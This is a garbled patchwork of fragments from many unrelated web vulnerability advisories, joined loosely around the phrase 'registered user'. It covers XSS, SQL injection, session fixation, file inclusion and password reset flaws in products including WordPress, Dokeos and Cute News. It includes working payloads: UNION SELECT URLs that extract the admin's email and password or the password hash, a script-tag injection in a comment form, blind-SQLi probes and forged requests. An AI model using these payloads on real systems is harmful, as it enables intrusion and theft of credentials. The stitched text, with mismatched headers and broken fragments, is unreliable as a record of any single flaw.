user registration
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: critical
Preconditions:
1. the attacker must be a registered user
2. the attacker must have blog editing privileges
Registered users with blog-keeping privileges can access the personal gallery
functionality, example URL:
=> XSS in Role (parameter: name, module: role, url: admin/user/roles)
The 'name' parameter is not properly sanitized, so an XSS payload can be
set as a role name.
This affects the administration pages as well as the user registration
page if the role is set to be shown.
=> XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)
######################## Bug Description ###########################
Description:
--------------------
A lot of SQL injections were found, and we exploited one of them.
A registered user can change his/her name and read all other users' private messages.
Vulnerabilities:
--------------------
+--> Multiple SQL Injection Vulnerabilities
&comment_email=&comment_url=&user_ip=<script>alert(666)</script>
&style_dropdown=--&comment_text=This+is+an+example+comment.
&comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n
The sender IP address can only be seen by a registered
user, so the code sent by the attacker will be executed
when a registered user views the comments page.
III - SESSION FIXATION
POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1
Possible attacks based on this method:
- mass user registration
- brute-force attacks
- flood attacks on the eyeBoard service, such as:
POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1
params=%3Capp%3EeyeBoard%3C%2Fapp%3E
The Dokeos E-Learning System has a local file include vulnerability in the script user_portal.php.
The vulnerable GET parameter is "include".
A registered user can exploit this vulnerability.
#################################################
1. SQL Injection in "private.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditions:
===============
a) the attacker must be logged in as a registered user
b) private message system must be enabled
Caused by:
===============
Parameter "disablesmilies" is not sanitized properly before being used in
SQL INJECTION (SQLi):
----------------------
######################
~~~~~~---->Unregistered user (GET var --> 'letra'):
http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*
<------------ Got mail/pass of user id = 1 (admin) (password not encrypted!) ------------>
"WordPress is a state-of-the-art publishing platform with a focus
on aesthetics, web standards, and usability. WordPress is both
free and priceless at the same time."
During research on MySQL column truncation vulnerabilities it was
discovered that the user registration system of WordPress is not
protected against this kind of attack. Further research then
showed that this vulnerability can be used to reset the passwords
of users to a random string when user registration is activated
in the blog.
4) Description of Vulnerability
The LiqPAY one-time-password technology is based on SMS messages sent to
the mobile phone of a registered user. In order to log in, the user has to submit
his mobile phone number on a web form and is then prompted for the 8-digit
password from the SMS message sent by the system to his mobile.
The vulnerability is that the SMS messages are not tagged in any way to show that they
come from the LiqPAY system.
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other PoC (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
SQL Injection:
File affected: show_post.php
This bug allows a guest to view the username and password hash (MD5) of a
registered user with the specified id (usually 1 for the admin):
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ',username),concat('password: ',password),4,5,6,7+FROM+users+WHERE+id=1%23
Now there's the Evanced Summer Reader Suite.
viewreviews.asp?ProgramID=35 union all select lol FROM lol--&CurrPage=2
XSS also works in the user registration page for the name and all other info, and a nice XSS exists under user reviews for every field in patronlogadd.asp.
The fun doesn't stop there. Next we have Room Reserve.
XSS works in the room reservation area.
Requisites: magic quotes = off
File affected: submit_post.php
This bug allows a registered user to view the username and password hash (MD5) of a
registered user with the specified id (usually 1 for the admin):
http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23
############################################################################
I'm going to rest for some time... J. Enrique and Pedro... wtf!?... something about ILIAS!! ^_^
<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>
I used my own account in my university...sorry for testing :P
level accounts can also exploit a partial file disclosure vulnerability
to view all usernames.
Cute News suffers from other security failures such as:
* User registration: in register.php the password input field should be
masked (shown as stars) to prevent shoulder surfing. This is fixed in the UTF-8b version.
* Email addresses are exposed by the news article template. The email
address should be obfuscated to prevent spam harvesting. There is an
option in both the 1.4.6 and UTF-8b versions to hide the email address.